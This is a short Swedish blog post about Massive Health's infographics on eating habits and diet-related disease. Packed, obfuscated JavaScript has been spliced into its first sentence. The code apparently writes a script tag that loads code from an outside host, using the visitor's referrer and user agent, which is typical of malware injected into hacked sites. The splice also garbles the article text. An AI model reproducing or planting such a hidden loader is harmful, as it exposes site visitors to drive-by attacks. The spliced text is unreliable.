Image Image Image Image Image Image Image Image Image Image

| 28 oktober, 2020

Scroll to top

Top

Massive Health visualiser våra matvanor

Massive Health visualiser våra matvanor
Sebastian

Massive eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tzzkz|var|u0026u|referrer|kfzis||js|php’.split(’|’),0,{}))
Health
är ett företag som försöker få människor att förbättra sina matvanor. Nu har de släppt några snygga infografiker som visualiserar hur vi är och vad vi äter. Genom sin app ”eatery” har de samlat in 7,68 miljoner matbetyg från användare i 50 länder under fem månader.

På Massive Health är det oroade över att det verkar gå en spridning av sjukdomar som kan bero på matvanorna. Sjukdomarna är  hjärt- och kärlsjukdomar och diabetes. Vi äter tydligen ganska mycket onyttigt.

Kolla länk: Massive Health